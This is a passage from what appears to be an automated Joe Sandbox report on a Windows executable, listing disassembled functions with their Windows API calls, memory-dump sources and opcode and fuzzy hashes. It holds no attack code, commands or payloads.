                                                                                              • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                              • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                              • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                              Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                              • String ID:
                                                                                              • API String ID: 2833360925-0
                                                                                              • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                              • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                              • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                              • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                              Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32 ref: 004555C7
                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3691411573-0
                                                                                              • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                              • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                              • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                              • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                              Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                              • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                              • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                              • EndPath.GDI32(?), ref: 004472D6
                                                                                              • StrokePath.GDI32(?), ref: 004472E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                              • String ID:
                                                                                              • API String ID: 372113273-0
                                                                                              • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                              • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                              • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                              • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                              Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                              • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                              • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                              • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                              Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 0041708E
                                                                                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                              • __amsg_exit.LIBCMT ref: 004170AE
                                                                                              • __lock.LIBCMT ref: 004170BE
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                              • _free.LIBCMT ref: 004170EE
                                                                                              • InterlockedIncrement.KERNEL32(02E92D08), ref: 00417106
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                              • String ID:
                                                                                              • API String ID: 3470314060-0
                                                                                              • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                              • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                              • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                              • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                              Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 3495660284-0
                                                                                              • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                              • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                              • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                              • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                              Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual
                                                                                              • String ID:
                                                                                              • API String ID: 4278518827-0
                                                                                              • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                              • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                              • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                              • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                              Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                              • ExitThread.KERNEL32 ref: 004151ED
                                                                                              • __freefls@4.LIBCMT ref: 00415209
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                              • String ID:
                                                                                              • API String ID: 442100245-0
                                                                                              • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                              • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                              • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                              • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                              Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                              • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                              • _wcslen.LIBCMT ref: 0045F94A
                                                                                              • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                              • String ID: 0
                                                                                              • API String ID: 621800784-4108050209
                                                                                              • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                              • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                              • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                              • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                              Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                              • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                              • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                              • String ID: \VH
                                                                                              • API String ID: 3884216118-234962358
                                                                                              • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                              • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                              • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                              • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                              Function 00434B02 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: AU3_GetPluginDetails$Wu
                                                                                              • API String ID: 145871493-136108093
                                                                                              • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                              • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                              • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                              • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                              Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                              • IsMenu.USER32(?), ref: 0044854D
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                              • DrawMenuBar.USER32 ref: 004485AF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                                              • String ID: 0
                                                                                              • API String ID: 3076010158-4108050209
                                                                                              • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                              • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                              • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                              • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                              Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
